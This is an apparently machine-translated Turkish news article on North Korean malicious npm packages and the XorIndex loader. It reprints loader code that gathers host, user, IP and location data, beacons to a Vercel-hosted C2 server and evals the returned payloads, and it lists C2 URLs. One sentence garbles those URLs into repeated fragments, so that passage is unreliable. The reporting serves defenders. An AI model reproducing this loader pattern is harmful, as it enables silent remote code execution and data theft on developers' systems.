Kuzey Koreli tehdit aktörleri, algılamadan önce toplu olarak 17.000’den fazla indirme alan 67 kötü amaçlı NPM paketinin konuşlandırılmasıyla yazılım tedarik zinciri saldırılarını artırdılar.
Bu son kampanya, devam eden “bulaşıcı röportaj” operasyonunun önemli bir genişlemesini temsil ederek, mevcut Hexeval Yükleyici altyapısının yanında Xorindex olarak adlandırılan daha önce bildirilmemiş bir kötü amaçlı yazılım yükleyici sunuyor.
Xor tarafından kodlanmış dizeleri ve dizin tabanlı gizleme tekniklerini ayırt edici kullanımı için adlandırılan yeni keşfedilen Xorindex kötü amaçlı yazılım, tehdit aktörlerinin sofistike kaçış mekanizmalarının geliştirilmesinde sürekli evrimini göstermektedir.
Kötü niyetli paketler, NPM ekosistemine 15 farklı e -posta adresine kayıtlı 18 farklı hesapla sızdı ve 27 paket keşif sırasında kayıt defterinde aktif kaldı.
Socket.DEV analistleri, bu kampanyayı geliştiricileri, kripto para sahiplerini ve hassas kimlik bilgilerine erişimi olan bireyleri hedefleyen daha geniş bir Kuzey Kore siber casusluk çabasının bir parçası olarak tanımladı.
Xorindex yükleyici, çok aşamalı bir saldırı çerçevesi olarak çalışır ve başlangıçta Beaverail ikinci aşamalı kötü amaçlı yazılımları kodlamadan önce ve yürütmeden önce, daha sonra kalıcı erişim için InvisibleFerret Backdoor’a atıfta bulunur.
.webp)
Kampanyanın altyapısı, Vercel gibi meşru platformlarda barındırılan, https://soc-log.vercel.app/api/ipcheck ve httpscheck ve httpscheck ve httpscheck ve httpscheck gibi URL’leri kullanan sabit kodlu komut ve kontrol uç noktalarına dayanıyor.
Bu yaklaşım, tehdit aktörlerinin operasyonel güvenliği sürdürmesine izin verirken, tespit mekanizmalarından kaçınmak için güvenilir barındırma hizmetlerinden yararlanır.
Xorindex Loader, Haziran ve Temmuz 2025 arasında 9.000’den fazla indirme biriktirdi ve yeni keşfedilen paketlerde 8.000 ilave indirme sağlayan devam eden Hexeval kampanyasına paralel olarak faaliyet gösterdi.
Bu çift yollu yaklaşım, tehdit aktörlerinin aynı anda birden fazla saldırı vektörünü koruma taahhüdünü göstermektedir.
Xorindex enfeksiyon mekanizması ve kod yürütme
Xorindex yükleyicinin enfeksiyon mekanizması, paket kurulumundan hemen sonra başlar ve kullanıcı etkileşimi olmadan kötü amaçlı kod yürütmek için node.js sonrası kancalardan yararlanır.
Kötü amaçlı yazılım, komut ve kontrol sunucuları ile iletişim kurmadan önce ana bilgisayar adı, kullanıcı adı, harici IP adresi, coğrafi konum verileri ve platform ayrıntıları dahil olmak üzere kapsamlı sistem bilgileri toplayan sofistike bir keşif aşaması kullanır.
ETH-Auditlog paketinden temsili bir kod parçacığı, yükleyicinin temel işlevselliğini gösterir:-
// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
const ip = await publicIp.v4();
const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;
return {
host: os.hostname(),
user: os.userInfo().username,
ip,
location: geo,
platform: os.platform()
};
}
// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function writer() {
const info = await gatherInfo();
const version = process.env.npm_package_version;
axios.post("https://log-writter.vercel.app/api/ipcheck", { ...info, version })
.then(res => {
eval(res.data.s1); // Execute primary payload
eval(res.data.s2); // Execute optional secondary payload
});
};Yükleyicinin temel prototiplerden sofistike kötü amaçlı yazılımlara evrimi, gizemli sistem profiline ve çok uçlu nokta komut rotasyonuna kadar basit uzaktan uzak kod yürütme yeteneklerinden ilerleyen, yazılım tedarik zinciri güvenliği için zorlu bir tehdit olarak konumlandırarak, gizleme tekniklerinde kasıtlı ilerleme gösterir.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi